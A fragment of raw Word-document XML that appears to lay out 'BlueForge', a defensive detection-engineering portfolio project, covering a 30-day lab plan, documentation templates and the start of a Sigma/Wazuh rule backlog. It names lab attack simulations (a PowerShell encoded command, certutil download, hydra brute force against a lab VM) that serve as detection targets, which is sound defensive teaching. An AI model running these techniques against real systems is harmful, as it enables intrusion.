              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Windows VM snapshot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docs(labs): windows vm build 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Install Sysmon with a good config (SwiftOnSecurity base)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Endpoint telemetry</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sysmon logging events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docs(labs): sysmon install + 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Stand up Wazuh manager (docker lab in</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">labs/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SIEM architecture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Wazuh dashboard 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feat(labs): wazuh docker lab compose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(wknd)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Enroll the Windows VM as a Wazuh agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Agent enrollment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Agent reporting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docs(labs): agent enrollment walkthrough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 (wknd)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Generate + export sample Sysmon events to JSONL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Log formats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examples/</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">real capture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feat(examples): captured sysmon samples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blueforge detect</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">on your capture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The pipeline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">First real detections firing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docs(lessons): first detection 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detections/engine.py</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; explain it in your own words</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sigma subset</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Written explanation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docs: annotate detection engine walkthrough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Write Sigma rule for T1059.001 (PowerShell) yourself</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Rule authoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">New rule + 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detection: powershell suspicious flags (T1059.001)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Add a test for your rule with a sample log</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">pytest fixtures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Passing 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test(detections): cover powershell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Tune a false positive out of a rule</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">FP handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Updated rule + FP note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detection: reduce FPs on powershell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 (wknd)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Simulate certutil download in the lab, capture logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">LOLBINs, T1105</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Telemetry + detection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detection: certutil download (T1105)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 (wknd)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Write the investigation steps for that alert</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Triage workflow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Playbook draft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docs(playbooks): certutil download triage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Map all current rules to ATT&amp;CK, run</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">attack_coverage.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">ATT&amp;CK navigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Coverage output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docs: attack coverage snapshot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Read Wazuh</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">local_rules.xml</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; test with</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">wazuh-logtest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Wazuh rules</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Verified custom rule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detection(wazuh): powershell encoded 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Add a Linux sshd brute-force correlation rule (Wazuh)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Correlation rules</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Firing brute-force alert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detection(wazuh): ssh brute force (T1110.001)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Capture a brute-force in the lab (hydra against a lab VM)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Attack simulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Alert + screenshot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docs(labs): ssh brute force simulation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Write a lessons-learned entry for week 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Reflection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docs/lessons</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">entry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docs(lessons): week 3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 (wknd)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Build the timeline idea: order events for one incident</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Timelines</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Timeline draft output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feat(hunting): naive event timeline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 (wknd)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Write a full incident report for the certutil scenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc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p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sample report in</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rP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docs: sample incident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Add IOC extraction to your workflow, test it</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Regex, IOCs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Passing IOC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test(enrichment): ioc extraction edge cases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Threat intel: wire AbuseIPDB (env key), handle "no key"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">API integration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Enrichment verdict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feat(enrichment): abuseipdb ip reputation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Write a detection for T1218 (LOLBIN, e.g. mshta/rundll32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Defense evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">New rule + 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detection: lolbin execution (T1218)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Screenshot the Wazuh dashboard + a firing alert</w:t>
            </w:r>
          </w:p>
        </w:tc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screenshots/</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">images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docs: add lab screenshots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 (wknd)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Polish README: architecture image, badges, quickstart</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc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p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Stronger README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docs: polish readme and add diagram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 (wknd)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Open GitHub milestones + labels; file issues for backlog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Project mgmt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Organized 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chore: seed milestones, labels,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Add 2 more Sigma rules toward the 20-rule goal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc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p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2 rules +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detection: two new sysmon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Write the "how I explain this project" interview note</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc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docs/11</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">personalized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docs(career): interview walkthrough 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Retrospective: what worked, what is next (Phase 2 plan)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Reflection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Month-1 review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docs(lessons): 30-day retrospective</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">By day 30 you have: a running lab, 8 to 12 tested detections mapped to ATT&amp;CK, one Wazuh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">correlation rule, IOC extraction and one live enrichment source, a sample incident report, lab</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">screenshots, and a green, well-presented repo. That is already interview-worthy.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9" w:name="X194c793156cd3ab4a14e1ca66bdb78ba3e6f15a"/>
      <w:r>
        <w:t xml:space="preserve">07. Documentation Generation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Good documentation is half the portfolio value: it is the part a hiring manager actually reads.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">BlueForge treats docs as first-class. This section is the index of every document type and the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">reusable templates that keep them consistent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="document-types-and-where-they-live"/>
      <w:r>
        <w:t xml:space="preserve">Document types and where they live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p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Front door: what/why/quickstart/architecture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Master blueprint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docs/00-master-blueprint.md</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The whole design in one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docs/03-architecture.md</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Components, data flow, trade-offs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Installation guide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docs/installation.md</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Zero-to-running setup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Threat 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docs/threat-model.md</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">What we defend, assets, assumptions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Detection guide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docs/detection-guide.md</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">How to author, test, and tune a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Investigation playbooks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docs/playbooks/</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(from template)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Step-by-step triage per alert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 docs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labs/*/README.md</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(from template)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Reproducible attack/detection exercises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Lessons learned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docs/lessons/</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(from template)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Reflection log; strong interview fuel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="templates-in-docstemplates"/>
      <w:r>
        <w:t xml:space="preserve">Templates (in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">docs/templates/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/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detection-template.md</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- every new rule starts here.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investigation-playbook-template.md</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- every alert type gets a playbook.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lab-template.md</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- every attack simulation is documented reproducibly.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lessons-learned-template.md</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- short reflection after each meaningful session.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="readme-template-skeleton"/>
      <w:r>
        <w:t xml:space="preserve">README template (skeleton)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A strong security-project README has, in order: one-line description, badges, a "why this exists"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">paragraph, an architecture diagram, a quickstart that works from a clean clone, the repo layout,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a detection-coverage note, the roadmap, and links into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 BlueForge's own README is the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">worked example; copy its structure for any future project.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="writing-standards"/>
      <w:r>
        <w:t xml:space="preserve">Writing standards</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lead with the answer. Prefer prose over bullet soup. For any security concept, cover four things:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">why it exists, how it works, how an attacker abuses it, and how a defender detects it. Keep diagrams</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in Mermaid so they live in git and render on GitHub. Never document a secret; document how to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">configure one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4" w:name="X2ec31089655a4a82ac7de551523164ed4b16a05"/>
      <w:r>
        <w:t xml:space="preserve">08. Detection Engineering Plan</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This is the detection backlog: 20 Sigma rule ideas and 20 Wazuh rule ideas, each mapped to MITRE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ATT&amp;CK, with the log source, a way to safely generate the telemetry, and the first investigation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">steps. Four Sigma rules are already implemented (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bf-0001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bf-0004</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">); the rest are the roadmap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Design principles for every rule:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">One behavior per rule. Small rules are testable and tunable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Always case-insensitive on command lines (attackers vary casing to evade).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Every rule maps to at least one ATT&amp;CK technique.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Every rule documents at least one false positive and one investigation step.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Every rule ships with a sample log and a test.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="Xaa11d8f4fbc1d7fa780243448785fda4c17c5d0"/>
      <w:r>
        <w:t xml:space="preserve">Part A: 20 Sigma rules (endpoint, mostly Sysmon)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ATT&amp;CK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Log source / key fields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to simulate (safe)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bf-0001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">PowerShell encoded command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T1059.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sysmon 1: Image, CommandLine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powershell -enc &lt;base64&gt;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">in lab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bf-0002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Certutil file download</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T1105, T1218</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
